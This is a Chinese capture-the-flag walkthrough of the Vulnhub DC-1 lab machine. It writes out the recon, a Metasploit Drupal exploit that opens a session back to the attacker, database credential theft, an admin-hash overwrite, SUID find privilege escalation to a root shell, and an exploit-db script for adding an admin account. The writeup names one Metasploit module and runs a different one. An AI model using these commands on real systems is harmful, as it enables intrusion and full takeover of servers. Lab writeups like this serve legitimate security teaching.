基本信息

Kali： 192.168.56.116

DC1: 192.168.56.115

實驗過程

先在Kali中使用arp-scan進行主機探活

sudo arp-scan --interface=eth1 192.168.56.0/24

逐個排查發現DC1的IP地址為192.168.56.115

然后使用nmap對主機進行探測:

nmap -sC -sV -A -oA vulnhub/DC1/DC1 192.168.56.115

主機分別開了: 22,80,111端口

我們先從80端口入手

可以發現網站是Drupal cms管理系統

我們啟動msf，搜索下Drupal可用的EXP

msf > search Drupal

這里我們選用

exploit/unix/webapp/drupal_drupalgeddon2

因為他是最新的，而且品質為excellent

msf6 > use exploit/unix/webapp/drupal_coder_execmsf6 exploit(unix/webapp/drupal_coder_exec) > show optionsmsf6 exploit(unix/webapp/drupal_coder_exec) > set RHOSTS 192.168.56.115msf6 exploit(unix/webapp/drupal_coder_exec) > set LHOST 192.168.56.116msf6 exploit(unix/webapp/drupal_coder_exec) > run

這樣我們就可以成功得到一個會話

我們用會話返回一個shell

發現flag1.txt

查看下flag1.txt內容

給我們一個提示 Every good CMS needs a config file - and so do you.

百度drupal配置文件的位置

sites/default/files

?

里面可以看到數據庫的賬號密碼，同時我們還可以看到flag2的內容說：爆破不是唯一獲得訪問權限方法

?

'database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t',

那么我們用獲得數據庫的賬號密碼登錄下數據看看

這里需要注意的是，我們需要用python轉換成標準的shell，否則就會出現下面的場景，進入mysql之后，shell就沒有反應:

我們輸入

python -c "import pty;pty.spawn('/bin/bash')"

mysql> show database; mysql> use drupaldb; mysql> show tables; mysql> select * from users; mysql> select name,pass from users;

這里的密碼是經過drupal加密

在scripts的文件夾中有用來算密碼的腳本，但是因為靶機的環境原因會報錯。

網上找了下，直接用別人算好的hash進行替換

明文：password密文：$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4

接下來我們把管理員的密碼重置下

?

mysql> update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4'where name='admin';

然后進行登錄

然后發現flag3

從flag3的內容可以看到，提示我們需要用find提權同時我們也可以在家目錄中找到flag4.

Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?

我們使用find找下具有root權限的suid。

# -perm? 按照文件權限來查找文件

# -u=w 基于用于可寫查找

# -type f 查找普通類型文件

find / -perm -u=s -type f 2>/dev/null

可以看到find是可以用來提權的

我們嘗試用find執行命令

# 這里需要注意-name參數填寫的文件名，是需要系統真實存在的

www-data@DC-1:/home/flag4$ find / -name flag4 -exec "whoami" \;

那么我們接下來用find提權

www‐data@DC‐1:/home/flag4$ find / -name flag4 -exec "/bin/sh" \;

這樣我們就拿到最終的flag

額外內容

?

使用CVE2014-3704添加管理賬號

在exploit-db中有可以直接利用的EXP，可以直接添加管理賬號地址：https://www.exploit-db.com/exploits/34992 我們在Kali上開啟HTTP服務，讓靶機從Kali上下載EXP

然后我們通過這個EXP創建管理賬號

?

www‐data@DC‐1:/var/www$ python 34992.py ‐t http://192.168.56.115/ ‐u dfz ‐p ms08067

然后就可以正常登錄

另一種查詢具有root權限命令的find語句

find / -user root -perm -4000 -print 2>/dev/null

創作挑戰賽新人創作獎勵來咯，堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的【Vulnhub靶机系列】DC1的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。